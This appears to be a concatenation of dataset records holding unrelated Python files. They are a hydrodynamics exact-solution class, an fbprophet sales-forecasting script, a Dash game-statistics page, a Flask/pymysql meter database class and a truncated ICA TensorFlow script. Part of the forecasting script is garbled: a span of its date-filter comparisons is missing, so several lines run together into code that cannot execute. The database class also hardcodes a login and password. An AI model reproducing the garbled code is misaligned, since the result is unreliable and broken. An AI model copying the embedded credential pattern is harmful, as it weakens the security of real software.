* np.ones(shape=r.shape) # [eV]\n pressure = bigGamma * density * temperature\n sie = pressure / density / (self.gamma - 1)\n\n return ExactSolution([r, density, velocity, temperature, pressure,\n sie],\n names=['position',\n 'density',\n 'velocity',\n 'temperature',\n 'pressure',\n 'specific_internal_energy'])\n\n\n \nclass PlanarCog12(Cog12):\n \"\"\"The planar Cog12 problem.\n \"\"\"\n\n parameters = {\n 'gamma': Cog12.parameters['gamma'],\n 'beta': Cog12.parameters['beta'],\n 'rho0': Cog12.parameters['rho0'],\n 'u0': Cog12.parameters['u0'],\n 'Gamma': Cog12.parameters['Gamma'], \n }\n geometry = 1\n\n \nclass CylindricalCog12(Cog12):\n \"\"\"The cylindrical Cog12 problem. \n \"\"\"\n\n parameters = {\n 'gamma': Cog12.parameters['gamma'],\n 'beta': Cog12.parameters['beta'],\n 'rho0': Cog12.parameters['rho0'],\n 'u0': Cog12.parameters['u0'],\n 'Gamma': Cog12.parameters['Gamma'], \n }\n geometry = 2\n\n\nclass SphericalCog12(Cog12):\n \"\"\"The spherical Cog12 problem. \n \"\"\"\n\n parameters = {\n 'gamma': Cog12.parameters['gamma'],\n 'beta': Cog12.parameters['beta'],\n 'rho0': Cog12.parameters['rho0'],\n 'u0': Cog12.parameters['u0'],\n 'Gamma': Cog12.parameters['Gamma'], \n }\n geometry = 3\n","sub_path":"exactpack/solvers/cog/cog12.py","file_name":"cog12.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"203110078","text":"#%%\n\nimport itertools\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport cloudpickle as cpkl\nfrom pathlib import Path\nimport numpy as np\nimport datetime\nfrom functools import reduce\nfrom fbprophet import Prophet\n#%% \n#df_train = pd.read_csv(\n# 'input/train.csv', usecols=[1, 2, 3, 4, 5], dtype={'onpromotion': str},\n# converters={'unit_sales': lambda u: float(u) if float(u) > 0 else 0},\n# skiprows=range(1, 124035460)\n#)\ntrain_pkl_file = 'input/train_pkl'\ntest_pkl_file = 'input/test_pkl'\nif not Path(train_pkl_file).is_file():\n train = pd.read_csv(\"input/train.csv\")\n print(train.head())\n transactions = pd.read_csv(\"input/transactions.csv\")\n stores = pd.read_csv(\"input/stores.csv\")\n oil = pd.read_csv(\"input/oil.csv\")\n items = pd.read_csv(\"input/items.csv\")\n holidays_events = pd.read_csv(\"input/holidays_events.csv\")\n train_dumps = cpkl.dumps([train,transactions,stores,oil,items,holidays_events])\n with open(train_pkl_file,'wb') as f:\n f.write(train_dumps)\nelse:\n print('Loading train dump')\n train,transactions,stores,oil,items,holidays_events = cpkl.loads(open(train_pkl_file,'rb').read())\nif not Path(test_pkl_file):\n test = pd.read_csv(\"input/test.csv\")\n test_dumps = cpkl.dumps(test)\n with open(test_pkl_file,'wb') as f:\n f.write(test_dumps)\nelse:\n print(\"Loading test dump\")\n test = cpkl.loads(open(test_pkl_file,'rb').read())\n# log transform\n#train[\"unit_sales\"] = train[\"unit_sales\"].apply(np.log1p)\n# Fill NAs\ntrain.loc[:, \"unit_sales\"].fillna(0, inplace=True)\n# Assume missing entris imply no promotion\ntrain.loc[:, \"onpromotion\"].fillna(\"False\", inplace=True)\n\n#%%\nstores_by_transactions = transactions.groupby('store_nbr',as_index=False)['transactions'].sum()\n#choose store_nbrs 42,54 and 45 for training\ntraining_store_nbrs = [42,54,45]\ntrain_samp = train.loc[train['store_nbr'].isin(training_store_nbrs)]\ntrain_samp.loc[:,\"date\"] = pd.to_datetime(train_samp.date)\ntrain_samp = train_samp.merge(items,on='item_nbr')\ntrans_samp = transactions.loc[transactions['store_nbr'].isin(training_store_nbrs)]\ntrans_samp.loc[:,\"date\"] = pd.to_datetime(trans_samp.date)\ntrans_samp = trans_samp.merge(stores,on='store_nbr')\ntrans_samp = trans_samp.merge(holidays_events,on='date',how=\"left\")\n\n#%%\n#subset most sold item in the store with most sales for testing forecast methods\nperStorePerItem=True\nlogTransform = False\ndate_range_fit = datetime.datetime(2016,8,16)\ndate_range_forecast = datetime.datetime(2016,9,1)\nif perStorePerItem:\n storex = 45\n itemx = 414750\n trainx = train_samp[train_samp.store_nbr==45]\n trainx_item = train_samp.loc[(train_samp.store_nbr==storex) & (train_samp.item_nbr==itemx)]\n #trainx_item = trainx_item.groupby(['item_nbr','date'],as_index=False)['unit_sales'].sum()\n trainx_itemlg = trainx_item.copy()\n if logTransform:\n trainx_itemlg.unit_sales = trainx_itemlg.unit_sales.apply(np.log1p) \n trainx_item_forfit = trainx_itemlg.loc[trainx_itemlg.date=date_range_fit )& (trainx_itemlg.date=date_range_fit) &\n (trainx_item.date=date_range_fit]\nplt.scatter(futureforecast.ds.astype(np.int64),futureforecast.yhat)\nprint(\"forecast {0:.4f}, overallmean {1:.4f}, overallmean_forfit{2:0.4f},meanoverforecast {3:.4f}\".format(\n NWRMSLE(trainx_item_forforecast.unit_sales,futureforecast.yhat,WEIGHTS,logTransform),\n NWRMSLE(trainx_item_forforecast.unit_sales,overallmean,WEIGHTS,logTransform),\n NWRMSLE(trainx_item_forforecast.unit_sales,overallmeanb4fit,WEIGHTS,logTransform),\n NWRMSLE(trainx_item_forforecast.unit_sales,mean_over_forecast_period,WEIGHTS,logTransform)))\n","sub_path":"fbprophet-starter.py","file_name":"fbprophet-starter.py","file_ext":"py","file_size_in_byte":5191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"416410607","text":"import pandas as pd\nimport plotly.express as px\nimport plotly.graph_objects as go\nimport numpy as np\nimport dash # (version 1.12.0) pip install dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nfrom app import app, df\nimport dash_table as dt\n\nddff_data={'Primary': 'ITA12L', 'Secondary': 'ITA12S', 'Win Rate%': 0.463, 'Presence Rate%': 0.009, 'Kill': 0.526, 'Dead': 0.747}\nddff = pd.DataFrame(ddff_data, columns=['Primary', 'Secondary', 'Win Rate%', 'Presence Rate%', 'Kill', 'Dead'], index=[])\n\nlayout = html.Div([\n\n #title\n html.Div([\n html.H1(\"Operators' Weapons and Capability\", style={'font-family': 'Helvetica',\n \"margin-top\": \"25\",\n \"margin-bottom\": \"0\"}, className='eight columns'),\n ], className='row'),\n #Dropdown Menu\n html.Div([\n html.Div([\n html.P(\"Platform:\"),\n dcc.Dropdown(\n id=\"platform_select\",\n options=[\n {\"label\": \"All\", \"value\": \"None\"},\n {\"label\": \"PC\", \"value\": \"PC\"},\n {\"label\": \"PS4\", \"value\": \"PS4\"},\n {\"label\": \"XONE\", \"value\": \"XONE\"}\n ],\n multi=False,\n value='None',\n clearable=False,\n )\n ], className='two columns', style={'margin-top': '10'}),\n html.Div([\n html.P('Rank:'),\n dcc.Dropdown(\n id=\"rank_select\",\n options=[\n {\"label\": \"All\", \"value\": \"None\"},\n {\"label\": \"Unranked\", \"value\": \"Unranked\"},\n {\"label\": \"Copper\", \"value\": \"Copper\"},\n {\"label\": \"Bronze\", \"value\": \"Bronze\"},\n {\"label\": \"Silver\", \"value\": \"Silver\"},\n {\"label\": \"Gold\", \"value\": \"Gold\"},\n {\"label\": \"Platinum\", \"value\": \"Platinum\"},\n {\"label\": \"Diamond\", \"value\": \"Diamond\"}\n ],\n multi=False,\n value='None',\n clearable=False,\n )\n ], className='two columns', style={'margin-top': '10'}),\n html.Div([\n html.P('Map:'),\n dcc.Dropdown(\n id=\"map_select\",\n options=[\n {\"label\": \"All\", \"value\": \"None\"},\n {\"label\": \"BANK\", \"value\": \"BANK\"},\n {\"label\": \"BARTLETT U.\", \"value\": \"BARTLETT U.\"},\n {\"label\": \"BORDER\", \"value\": \"BORDER\"},\n {\"label\": \"CHALET\", \"value\": \"CHALET\"},\n {\"label\": \"CLUB HOUSE\", \"value\": \"CLUB HOUSE\"},\n {\"label\": \"COASTLINE\", \"value\": \"COASTLINE\"},\n {\"label\": \"CONSULATE\", \"value\": \"CONSULATE\"},\n {\"label\": \"FAVELAS\", \"value\": \"FAVELAS\"},\n {\"label\": \"HEREFORD BASE\", \"value\": \"HEREFORD BASE\"},\n {\"label\": \"HOUSE\", \"value\": \"HOUSE\"},\n {\"label\": \"KAFE DOSTOYEVSKY\", \"value\": \"KAFE DOSTOYEVSKY\"},\n {\"label\": \"KANAL\", \"value\": \"KANAL\"},\n {\"label\": \"OREGON\", \"value\": \"OREGON\"},\n {\"label\": \"PLANE\", \"value\": \"PLANE\"},\n {\"label\": \"SKYSCRAPER\", \"value\": \"SKYSCRAPER\"},\n {\"label\": \"YACHT\", \"value\": \"YACHT\"}\n ],\n multi=False,\n value='None',\n clearable=False,\n )\n ], className='two columns', style={'margin-top': '10'}),\n html.Div([\n html.P('Operator:'),\n dcc.Dropdown(\n id=\"operator_select\",\n options=[\n {\"label\": \"BOPE-CAPITAO\", \"value\": \"BOPE-CAPITAO\"},\n {\"label\": \"BOPE-CAVEIRA\", \"value\": \"BOPE-CAVEIRA\"},\n {\"label\": \"G.E.O.-JACKAL\", \"value\": \"G.E.O.-JACKAL\"},\n {\"label\": \"G.E.O.-MIRA\", \"value\": \"G.E.O.-MIRA\"},\n {\"label\": \"GIGN-DOC\", \"value\": \"GIGN-DOC\"},\n {\"label\": \"GIGN-MONTAGNE\", \"value\": \"GIGN-MONTAGNE\"},\n {\"label\": \"GIGN-ROOK\", \"value\": \"GIGN-ROOK\"},\n {\"label\": \"GIGN-TWITCH\", \"value\": \"GIGN-TWITCH\"},\n {\"label\": \"GSG9-BANDIT\", \"value\": \"GSG9-BANDIT\"},\n {\"label\": \"GSG9-BLITZ\", \"value\": \"GSG9-BLITZ\"},\n {\"label\": \"GSG9-IQ\", \"value\": \"GSG9-IQ\"},\n {\"label\": \"GSG9-JAGER\", \"value\": \"GSG9-JAGER\"},\n {\"label\": \"JTF2-BUCK\", \"value\": \"JTF2-BUCK\"},\n {\"label\": \"JTF2-FROST\", \"value\": \"JTF2-FROST\"},\n {\"label\": \"NAVYSEAL-BLACKBEARD\", \"value\": \"NAVYSEAL-BLACKBEARD\"},\n {\"label\": \"NAVYSEAL-VALKYRIE\", \"value\": \"NAVYSEAL-VALKYRIE\"},\n {\"label\": \"SAS-MUTE\", \"value\": \"SAS-MUTE\"},\n {\"label\": \"SAS-SLEDGE\", \"value\": \"SAS-SLEDGE\"},\n {\"label\": \"SAS-SMOKE\", \"value\": \"SAS-SMOKE\"},\n {\"label\": \"SAS-THATCHER\", \"value\": \"SAS-THATCHER\"},\n {\"label\": \"SAT-ECHO\", \"value\": \"SAT-ECHO\"},\n {\"label\": \"SAT-HIBANA\", \"value\": \"SAT-HIBANA\"},\n {\"label\": \"SPETSNAZ-FUZE\", \"value\": \"SPETSNAZ-FUZE\"},\n {\"label\": \"SPETSNAZ-GLAZ\", \"value\": \"SPETSNAZ-GLAZ\"},\n {\"label\": \"SPETSNAZ-KAPKAN\", \"value\": \"SPETSNAZ-KAPKAN\"},\n {\"label\": \"SPETSNAZ-TACHANKA\", \"value\": \"SPETSNAZ-TACHANKA\"},\n {\"label\": \"SWAT-ASH\", \"value\": \"SWAT-ASH\"},\n {\"label\": \"SWAT-CASTLE\", \"value\": \"SWAT-CASTLE\"},\n {\"label\": \"SWAT-PULSE\", \"value\": \"SWAT-PULSE\"},\n {\"label\": \"SWAT-THERMITE\", \"value\": \"SWAT-THERMITE\"}\n ],\n multi=False,\n value='G.E.O.-JACKAL',\n clearable=False,\n )\n ], className='two columns', style={'margin-top': '10'})\n ], className='row'),\n html.Div([\n html.Div([\n html.H4('Primary & Secondary Weapon data Per Game', style={'padding-bottom': '26px', 'padding-top': '16px'}),\n dt.DataTable(\n id='datatable',\n columns=[{\"name\": i, \"id\": i} for i in ddff.columns],\n sort_action='native',\n style_header={'backgroundColor': 'rgb(230, 230, 230)', 'fontWeight': 'bold'}\n ),\n\n\n ], className=\"six columns\"),\n html.Div([\n dcc.Graph(id='delta_figure', figure={}),\n ], className=\"six columns\")\n ], className='row'),\n html.Div([\n html.Div([\n html.H4('Operator Capability', style={'margin-top': '-10px'}),\n html.P('5 is the maximum value for each dimension,'),\n html.P('which means the operator is the best at this ability for overall.'),\n dcc.Graph(id='ability_figure', figure={})\n ], className=\"six columns\"),\n html.Div([\n html.P('Win Delta:', style={'fontWeight': 'bold'}),\n html.P('Win Delta = (The Win rate of WeaponCombo) - (The Win rate of the Operator)'),\n html.P('If the numbers of Win Delta is greater than 0, You have higher probability than average to win this game by using this Weapon combos.'),\n html.P('Presence:', style={'fontWeight': 'bold'}),\n html.P('Presence = (The presence number of WeaponCombo) / (The Overall presence number of the Operator)'),\n html.P('Presence means the popularity of this WeaponCombos.'),\n html.P('Kill: (in Table)', style={'fontWeight': 'bold'}),\n html.P('Kill = (The total kill of the WeaponCombo) / (The number of picked times of the WeaponCombo)'),\n html.P('Kill means the average kills can get in each round when you pick the WeaponCombo.'),\n html.P('Dead: (in Table)', style={'fontWeight': 'bold'}),\n html.P('Dead = (The total Dead when pick WeaponCombo) / (The number of picked times of the WeaponCombo)'),\n html.P('Dead means the average dead times in each round when you pick the WeaponCombo.'),\n ], className=\"six columns\")\n ], className='row'),\n html.Hr(),\n\n], className='ten columns offset-by-one', style={'opacity': '0.955'})\n\n\n\n# callback and function for the dataTable\n@app.callback(\n Output('datatable', 'data'),\n [dash.dependencies.Input('platform_select', 'value'),\n dash.dependencies.Input('rank_select', 'value'),\n dash.dependencies.Input('map_select', 'value'),\n dash.dependencies.Input('operator_select', 'value')]\n)\ndef generate_table(platform_selected, rank_selected, map_selected, operator_selected):\n table_data = df.copy()\n if operator_selected != \"None\":\n table_data = table_data.loc[(table_data['operator'] == operator_selected)]\n if rank_selected != \"None\":\n table_data = table_data.loc[(table_data['skillrank'] == rank_selected)]\n if map_selected != \"None\":\n table_data = table_data.loc[(table_data['mapname'] == map_selected)]\n if platform_selected != \"None\":\n table_data = table_data.loc[(table_data['platform'] == platform_selected)]\n\n factor = [(\"primaryweapon\"), (\"secondaryweapon\")]\n table_data = table_data.groupby(factor).sum()[[\"haswon\", \"count\", \"nbkills\", \"isdead\"]].apply(lambda x: x).reset_index()\n table_data['Kill'] = round(table_data['nbkills'] / table_data['count'], 3)\n table_data['Dead'] = round(table_data['isdead'] / table_data['count'], 3)\n table_data['Win Rate%'] = round((table_data['haswon'] / table_data['count'])*100, 3)\n table_data['Primary'] = table_data['primaryweapon']\n table_data['Secondary'] = table_data['secondaryweapon']\n\n tempNum = 0\n for each in table_data['count']:\n tempNum += each\n\n # print(tempNum)\n\n table_data['Presence Rate%'] = round((table_data['count'] / tempNum)*100, 3)\n factor7 = [(\"Primary\"), (\"Secondary\")]\n\n res = table_data.groupby(factor7).sum()[[\"Win Rate%\", \"Presence Rate%\", \"Kill\", \"Dead\"]].apply(lambda x: x).reset_index()\n\n rows = res.to_dict('records')\n # print(rows)\n return rows\n\n else:\n return\n\n\n# callback and function for the win Delta Chart\n@app.callback(\n Output(component_id='delta_figure', component_property='figure'),\n [Input(component_id='platform_select', component_property='value'),\n Input(component_id='rank_select', component_property='value'),\n Input(component_id='map_select', component_property='value'),\n Input(component_id='operator_select', component_property='value')]\n)\ndef generate_graph(platform_selected, rank_selected, map_selected, operator_selected):\n dff = df.copy()\n if operator_selected != \"None\":\n dff = dff.loc[(dff['operator'] == operator_selected)]\n if rank_selected != \"None\":\n dff = dff.loc[(dff['skillrank'] == rank_selected)]\n if map_selected != \"None\":\n dff = dff.loc[(dff['mapname'] == map_selected)]\n if platform_selected != \"None\":\n dff = dff.loc[(dff['platform'] == platform_selected)]\n\n #dealing with data\n factor = [(\"primaryweapon\"), (\"secondaryweapon\")]\n wdf = dff.groupby(factor).sum()[[\"haswon\", \"count\"]].apply(lambda x: x).reset_index()\n wdf['winrate'] = wdf['haswon'] / wdf['count']\n factor2 = ['operator']\n avf = dff.groupby(factor2).sum()[[\"haswon\", \"count\"]].apply(lambda x: x).reset_index()\n avf['winrate'] = avf['haswon'] / avf['count']\n tempNum = avf['winrate'][0]\n wdf['winDelta'] = (wdf['winrate'] - tempNum)*100\n tempNum = avf['count'][0]\n wdf['presence'] = (wdf['count'] / tempNum)*100\n\n\n #generate graph\n fig = go.Figure()\n for index, row in wdf.iterrows():\n tempName = row['primaryweapon'] + ' & ' + row['secondaryweapon']\n fig.add_trace(go.Scatter(x=[row['presence']], y=[row['winDelta']], mode='markers', marker=dict(size=[20]),name=tempName))\n\n fig.update_layout(title='Weapon Influence about Win Rate',\n xaxis_title='Presence (in %)',\n yaxis_title='Win Delta(in %)',\n yaxis_zeroline=True,\n yaxis_zerolinecolor='red',\n )\n\n\n return fig\n else:\n\n fig = go.Figure()\n fig.update_layout(title='Weapon combo Influence about Win Rate',\n xaxis_title='Presence (in %)',\n yaxis_title='Win Delta(in %)')\n\n return fig\n\n@app.callback(\n Output(component_id='ability_figure', component_property='figure'),\n [Input(component_id='platform_select', component_property='value'),\n Input(component_id='rank_select', component_property='value'),\n Input(component_id='map_select', component_property='value'),\n Input(component_id='operator_select', component_property='value')]\n)\ndef generate_abgraph(platform_selected, rank_selected, map_selected, operator_selected):\n if operator_selected != \"None\":\n temp_df = df.copy()\n\n temp_df = temp_df[temp_df.operator != 'SWAT-RESERVE']\n temp_df = temp_df[temp_df.operator != 'GIGN-RESERVE']\n temp_df = temp_df[temp_df.operator != 'GSG9-RESERVE']\n temp_df = temp_df[temp_df.operator != 'SAS-RESERVE']\n temp_df = temp_df[temp_df.operator != 'SPETSNAZ-RESERVE']\n if rank_selected != \"None\":\n temp_df = temp_df.loc[(temp_df['skillrank'] == rank_selected)]\n if map_selected != \"None\":\n temp_df = temp_df.loc[(temp_df['mapname'] == map_selected)]\n if platform_selected != \"None\":\n temp_df = temp_df.loc[(temp_df['platform'] == platform_selected)]\n\n factor2 = [('operator'),('role')]\n temp_df = temp_df.groupby(factor2).sum()[[\"haswon\", \"count\", \"nbkills\", \"isdead\"]].apply(lambda x: x).reset_index()\n temp_df['Kill'] = temp_df['nbkills'] / temp_df['count']\n temp_df['Dead'] = temp_df['isdead'] / temp_df['count']\n temp_df['Win Rate'] = temp_df['haswon'] / temp_df['count']\n totalnum = 0\n for each in temp_df['count']:\n totalnum += each\n temp_df['Presence'] = (temp_df['count'] / totalnum)*500\n\n Att_df = temp_df.loc[(temp_df['role'] == 'Attacker')]\n Def_df = temp_df.loc[(temp_df['role'] == 'Defender')]\n cur_role = ''\n cur_df = Att_df\n\n for index, row in temp_df.iterrows():\n if row['operator'] == operator_selected:\n cur_role = row['role']\n\n if cur_role == 'Defender':\n cur_df = Def_df\n\n\n #Win Rate Rank\n winRank_df = cur_df.groupby('operator').sum()[['Win Rate']].apply(lambda x: x).reset_index()\n winRank_df = winRank_df.sort_values('Win Rate')\n #Kill Rank high to low\n killRank_df = cur_df.groupby('operator').sum()[['Kill']].apply(lambda x: x).reset_index()\n killRank_df = killRank_df.sort_values('Kill')\n #dead Rank\n deadRank_df = cur_df.groupby('operator').sum()[['Dead']].apply(lambda x: x).reset_index()\n deadRank_df = deadRank_df.sort_values('Dead', ascending=False)\n #Popularity Rank high to low\n popularity_df = cur_df.groupby('operator').sum()[['Presence']].apply(lambda x: x).reset_index()\n popularity_df = popularity_df.sort_values('Presence')\n\n #Calculate score for each element\n\n kill_rank = 0\n for index, row in killRank_df.iterrows():\n kill_rank += 1\n if row['operator'] == operator_selected:\n break\n\n\n dead_rank = 0\n for index, row in deadRank_df.iterrows():\n dead_rank += 1\n if row['operator'] == operator_selected:\n break\n\n\n win_rank = 0\n for index, row in winRank_df.iterrows():\n win_rank += 1\n if row['operator'] == operator_selected:\n break\n\n\n popularity_rank = 0\n for index, row in popularity_df.iterrows():\n popularity_rank += 1\n if row['operator'] == operator_selected:\n break\n\n #score\n kill_score = kill_rank/3\n dead_score = dead_rank/3\n win_score = win_rank/3\n popularity_score = popularity_rank/3\n # print(\"there is test for score: \\n\")\n # print(kill_score, dead_score,win_score,popularity_score)\n\n\n #generate graph\n\n\n test_df = pd.DataFrame(dict(\n r=[win_score, kill_score, popularity_score, dead_score],\n theta=['Win Rate', 'Kill', 'Popularity',\n 'Survive']))\n fig77 = px.line_polar(test_df, r='r', theta='theta', line_close=True)\n fig77.update_traces(fill='toself')\n fig77.update_layout(\n polar=dict(\n radialaxis=dict(\n visible=True,\n range=[0, 5]\n )),\n showlegend=False\n )\n return fig77\n else:\n test_df = pd.DataFrame(dict(\n r=[0, 0, 0, 0],\n theta=['Win Rate', 'Kill', 'Popularity',\n 'Survive']))\n fig77 = px.line_polar(test_df, r='r', theta='theta', line_close=True)\n fig77.update_traces(fill='toself')\n fig77.update_layout(\n polar=dict(\n radialaxis=dict(\n visible=True,\n range=[0, 5]\n )),\n showlegend=False\n )\n return fig77","sub_path":"pages/page3.py","file_name":"page3.py","file_ext":"py","file_size_in_byte":17698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"358935861","text":"import pymysql\nimport sqlite3\nfrom flask import g\n\nclass Dao:\n\n def __init__(self):\n self.__SELECT_ALL = '''\n select electricity_meter_tb.serial_cd as serial_cd,\n modem_tb.modem_cd as modem_cd ,\n electricity_meter_tb.electricity_filename as electricity_filename, \n date_format(electricity_meter_tb.electricity_save_date, '%Y-%m-%d %H:%i:%s') as electricity_save_date \n from electricity_meter_tb \n left join modem_tb \n on modem_tb.serial_cd = electricity_meter_tb.serial_cd \n where electricity_meter_tb.del_flag = 0\n ORDER BY electricity_save_date DESC;\n '''\n\n self.__SELECT_ONE = '''\n select \n electricity_meter_tb.serial_cd as serial_cd, \n electricity_meter_tb.supply_type as supply_type, \n electricity_meter_tb.typename as typename, \n electricity_meter_tb.electricity_filename as electricity_filename, \n date_format(electricity_meter_tb.electricity_save_date, '%%Y-%%m-%%d %%H:%%i:%%s') as electricity_save_date, \n modem_tb.modem_cd as modem_cd, \n modem_tb.modem_filename as modem_filename,\n date_format(modem_tb.modem_save_date, '%%Y-%%m-%%d %%H:%%i:%%s') as modem_save_date \n from electricity_meter_tb \n left join modem_tb \n on modem_tb.serial_cd = electricity_meter_tb.serial_cd \n where electricity_meter_tb.del_flag = 0 \n and electricity_meter_tb.serial_cd = %s \n '''\n\n self.__SELECT_PRE_IMAGE = '''\n select \n electricity_preprocessing_tb.pre_filename as pre_filename\n from electricity_meter_tb \n join electricity_preprocessing_tb \n on electricity_preprocessing_tb.serial_cd = electricity_meter_tb.serial_cd\n where electricity_meter_tb.del_flag = 0\n and electricity_meter_tb.serial_cd = %s\n '''\n\n self.__SELECT_BY_SERIAL_CD = '''\n select serial_cd \n from electricity_meter_tb \n where serial_cd = %s\n '''\n # 데이터베이스 연결 메소드\n def connect(self):\n try :\n # 연결\n self.con = pymysql.connect(host='localhost',\n port=3306,\n user='flaskServer',\n passwd='20210420',\n db='electricitydb',\n charset='utf8')\n # 데이터베이스 사용 객체 생성\n self.cursor = self.con.cursor()\n except Exception as err:\n print('DBConnection Error : ', err)\n return False\n return True\n\n # 데이터베이스 연결 해제 메소드\n def close(self):\n self.con.close()\n\n # 전체 데이터 가져오기\n def select_all(self):\n # 데이터베이스 연결\n result = True\n li = []\n connect_result = self.connect()\n if not connect_result:\n return connect_result, li\n try:\n\n # sql 문 실행\n self.cursor.execute(self.__SELECT_ALL)\n data = self.cursor.fetchall()\n # 데이터를 저장할 list\n for temp in data:\n item = {}\n item['serial_cd'] = temp[0]\n item['modem_cd'] = temp[1]\n item['electricity_filename'] = temp[2]\n item['electricity_save_date'] = temp[3]\n li.append(item)\n\n\n except self.cursor.Error as err:\n # insert 실패시 False 반환\n result = False\n print('MySQL Error : ', err)\n self.close()\n return result, li\n\n # dict형태로 데이터를 받아서 삽입하는 메소드\n def select_one(self, serial_cd):\n print(\"server 들어옴\")\n result = True\n item = {}\n li = []\n connect_result = self.connect()\n if not connect_result:\n return connect_result, li\n try:\n\n self.cursor.execute(self.__SELECT_ONE, serial_cd)\n data = self.cursor.fetchone()\n print(\"상세데이터 출력 : \", data)\n item['serial_cd'] = data[0]\n item['supply_type'] = data[1]\n item['typename'] = data[2]\n item['electricity_filename'] = data[3]\n item['electricity_save_date'] = data[4]\n item['modem_cd'] = data[5]\n item['modem_filename'] = data[6]\n item['modem_save_date'] = data[7]\n\n self.cursor.execute(self.__SELECT_PRE_IMAGE, serial_cd)\n imageList = self.cursor.fetchall()\n\n images = []\n for temp in imageList:\n\n images.append(temp[0])\n item['pre_filenames'] = images\n li.append(item)\n except self.cursor.Error as err:\n # insert 실패시 False 반환\n result = False\n print('MySQL Error : ', err)\n self.close()\n return result, item\n\n # 계량기 정보 입력\n def insert_meter(self, meter):\n # 결과를 저장할 변수\n result = False\n self.connect()\n\n data = self.cursor.execute(self.__SELECT_BY_SERIAL_CD ,\n (meter['serial_cd']))\n print('data::', type(data), ' ', data)\n\n if data == 0:\n # data = self.cursor.fetchone()\n # itemid = 1\n # # 데이터가 존재하는 경우는 가장 큰 itemid+1\n # if data[0] != None:\n # itemid = int(data[0]) + 1\n try:\n\n self.cursor.execute('insert into electricity_meter_tb ' +\n '(serial_cd, supply_type, typename,' +\n ' electricity_filename, region_cd) ' +\n 'values(%s,%s,%s,%s,%s)',\n (meter['serial_cd'], meter['supply_type'], meter['typename'],\n meter['electricity_filename'], meter['region_cd']))\n # 성공여부 확인 rowcount는 영향받은 행의 개수\n if self.cursor.rowcount >= 1:\n result = True\n\n except Exception as e:\n print(e)\n result = False\n\n self.con.commit()\n self.close()\n\n return result\n\n # 바코드 정보 입력\n\n def insert_barcode(self, barcode):\n # 결과를 저장할 변수\n result = False\n self.connect()\n\n data = self.cursor.execute('select serial_cd from electricity_meter_tb where serial_cd = %s',\n (barcode['serial_cd']))\n print('data::', type(data), ' ', data)\n\n # self.cursor.execute('select max(itemid) from item')\n # data = self.cursor.fetchone()\n # itemid = 1\n # # 데이터가 존재하는 경우는 가장 큰 itemid+1\n # if data[0] != None:\n # itemid = int(data[0]) + 1\n print(\"DAO::\", barcode)\n if data == 1:\n try:\n\n self.cursor.execute('insert into modem_tb ' +\n '(modem_cd, serial_cd, modem_filename) ' +\n 'values(%s,%s,%s)',\n (barcode['modem_cd'], barcode['serial_cd'], barcode['modem_filename']))\n # 성공여부 확인 rowcount는 영향받은 행의 개수\n if self.cursor.rowcount >= 1:\n result = True\n\n except Exception as e:\n print(e)\n result = False\n\n self.con.commit()\n self.close()\n\n return result","sub_path":"server/ElectricityOCRServer/common/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":7716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"5770728","text":"import tensorflow as tf\nimport soundfile as sf\nimport numpy as np\nimport time\nfrom tensorflow.python.client import timeline\nimport cProfile\n\n#This version of infomax uses the logcosh to approximate differential entropy.\n#This does not work.\n\n#read data, the type of data is a 1-D np.ndarray\ndata1, fs1 = sf.read('/home/yanlong/Downloads/2017T1/Comp489/ICA/Data/a_sig1.wav')\ndata2, fs2 = sf.read('/home/yanlong/Downloads/2017T1/Comp489/ICA/Data/a_sig2.wav')\n\n#Windows reading path\n# data1, fs1 = sf.read('E:\\\\Courses\\\\Comp489\\\\ICA\\\\ICAFast\\\\Data\\\\a_sig1.wav')\n# data2, fs2 = sf.read('E:\\\\Courses\\\\Comp489\\\\ICA\\\\ICAFast\\\\Data\\\\a_sig2.wav')\n\n#this sets the random seed to a fixed number.\nnp.random.seed(10)\n\nn_sources = 2\nbatch_size = 100\n\n#randomly initialize the mixing matrix A\n#each entry is from uniform[0,1), \nA = np.random.rand(2,2)\n\n#the number of data points. Also the number of columns.\n#Ns = len(data1)\nNs = fs1 * 5 #self defined data length, 5 seconds of speech\ndata1 = data1[:Ns]\ndata2 = data2[:Ns]\n\n#stack the two data arrays together as the source signals\n#the shape of S is (2,Ns)\nS = np.array((data1,data2))\n\n#V is the observed signal mixture.\nV = np.dot(A,S)\n\n#Remove mean\n#To take the mean of each row, choose axis = 1\nmeanValue = np.mean(V, axis = 1)\n#This changes meanValue from 1d to 2d, now a column vector with size dimension*1\nmeanValue = np.reshape(meanValue,(len(meanValue),1))\n#This creates an array full of ones with the same length as the column number of V\noneArray = np.ones((1,Ns))\n#This creates a matrix full of mean values for each row\nmeanMatrix = np.dot(meanValue,oneArray)\n#This gives V zero mean\nV = V - meanMatrix\n\n#whitening\n#this computes the covariance matrix of V. Each row should be a variable and each column should be an observation.\ncovMatrix = np.cov(V)\n#this gets the svd form of the covMatrix.\nP,d,Qt = np.linalg.svd(covMatrix, full_matrices=False)\nQ = Qt.T\n#this gets the first L entries\nd = d[:n_sources]\nD = np.diag(d)\n#this gets the first L columns of singular (eigen) vectors\nE = P[:,:n_sources]\n#this computes the whitening matrix D^(-1/2)*E.T\nwhiteningMatrix = np.dot(np.linalg.inv(np.sqrt(D)),E.T)\n#whitened is the whitened signal matrix\nwhitened = np.dot(whiteningMatrix,V)\n\ndata = whitened\ndata = np.transpose(data)\nvar = np.var(data[0:1000,0])\nprint(var)\n\n#None means it can be any value\nx = tf.placeholder('float', [None, n_sources])\n\n\n#The two functions below are not necessary \n#This give s a random block of data with size num\ndef next_batch(num, data):\n\n #Return a total of `num` random samples and labels. \n\n idx = np.arange(0 , len(data)-num)\n np.random.shuffle(idx)\n idx = idx[0]\n #This gives num random columns of the data array\n data_shuffle = data[idx:idx+num,:]\n\n return np.asarray(data_shuffle)\n\n#This gives a fixed block of data from a given start index.\ndef next_fixed_batch(num, data, startIndex):\n\n data_batch = data[startIndex:startIndex+num,:] \n return np.asarray(data_batch)\n\n'''\n#total random columns of data with length num\ndef next_batch(num, data):\n \n #Return a total of `num` random samples and 